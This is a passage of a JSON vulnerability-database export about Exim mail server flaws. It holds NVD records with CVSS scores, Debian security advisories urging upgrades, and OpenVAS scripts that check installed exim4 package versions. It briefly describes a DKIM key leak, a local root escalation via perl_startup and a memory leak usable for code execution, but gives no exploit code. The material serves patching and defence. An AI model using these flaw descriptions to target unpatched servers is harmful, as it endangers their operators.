"CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2020-8015"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0753-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UMX36VOLIS2TDKA3MXOUO365NDUK5WQ3/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-06T14:11:40", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "cve", "title": "CVE-2017-1000369", "cwe": ["CWE-404"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-12T13:35:00", "cpe": ["cpe:/a:exim:exim:4.89", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:exim:exim:4.87.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:exim:exim:4.88"], "id": "CVE-2017-1000369", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:exim:exim:4.89:rc6:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc4:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc7:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc6:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc3:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.87.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc2:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc3:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc5:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc4:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc5:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc1:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:-:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:-:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc2:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc1:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:12", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "type": "cve", "title": "CVE-2016-9963", "cwe": ["CWE-320"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-15T12:47:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/a:exim:exim:4.87"], "id": "CVE-2016-9963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:exim:exim:4.87:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-12-06T14:20:41", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T23:59:00", "type": "cve", "title": "CVE-2016-1531", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:exim:exim:4.86"], "id": "CVE-2016-1531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:exim:exim:4.86:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2021-10-21T22:09:48", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3747-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-9963\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-25T10:08:23", "type": "debian", "title": "[SECURITY] [DSA 3747-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-25T10:08:23", "id": "DEBIAN:DSA-3747-1:7D21A", "href": "https://lists.debian.org/debian-security-announce/2016/msg00331.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T11:33:22", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3747-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-9963\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-25T10:08:23", "type": "debian", "title": "[SECURITY] [DSA 3747-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-25T10:08:23", "id": "DEBIAN:DSA-3747-1:65DFE", "href": "https://lists.debian.org/debian-security-announce/2016/msg00331.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T19:04:32", "description": "Package : exim4\nVersion : 4.80-7+deb7u4\nCVE ID : CVE-2016-9963\n\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-25T10:59:29", "type": "debian", "title": "[SECURITY] [DLA 762-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-25T10:59:29", "id": "DEBIAN:DLA-762-1:0D8D2", "href": "https://lists.debian.org/debian-lts-announce/2016/12/msg00038.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T11:22:12", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3888-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJune 19, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2017-1000369\n\nThe Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling. For the\nfull details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T15:34:00", "type": "debian", "title": "[SECURITY] [DSA 3888-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T15:34:00", "id": "DEBIAN:DSA-3888-1:AEA40", "href": "https://lists.debian.org/debian-security-announce/2017/msg00147.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T17:14:58", "description": "Package : exim4\nVersion : 4.80-7+deb7u5\nCVE ID : CVE-2017-1000369\n\nExim supports the use of multiple "-p" command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues allows\nattackers to cause arbitrary code execution.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-25T01:33:19", "type": "debian", "title": "[SECURITY] [DLA 1001-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-25T01:33:19", "id": "DEBIAN:DLA-1001-1:275F5", "href": "https://lists.debian.org/debian-lts-announce/2017/06/msg00030.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T11:38:07", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3517-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-1531\n\nA local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using the\n'perl_startup' option (Only Exim via exim4-daemon-heavy enables Perl\nsupport).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-14T05:48:18", "type": "debian", "title": "[SECURITY] [DSA 3517-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-14T05:48:18", "id": "DEBIAN:DSA-3517-1:82080", "href": "https://lists.debian.org/debian-security-announce/2016/msg00091.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:29:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3517-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-1531\n\nA local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using the\n'perl_startup' option (Only Exim via exim4-daemon-heavy enables Perl\nsupport).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-14T05:48:18", "type": "debian", "title": "[SECURITY] [DSA 3517-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-14T05:48:18", "id": "DEBIAN:DSA-3517-1:EFA69", "href": "https://lists.debian.org/debian-security-announce/2016/msg00091.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:55:12", "description": "Bjoern Jacke discovered that Exim,\nDebian", "cvss3": {}, "published": "2016-12-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703747", "href": "http://plugins.openvas.org/nasl.php?oid=703747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703747);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent.\nexim4 is the metapackage depending on the essential components for a basic exim4\ninstallation.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:51", "description": "Bjoern Jacke discovered that Exim,\nDebian", "cvss3": {}, "published": "2016-12-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# 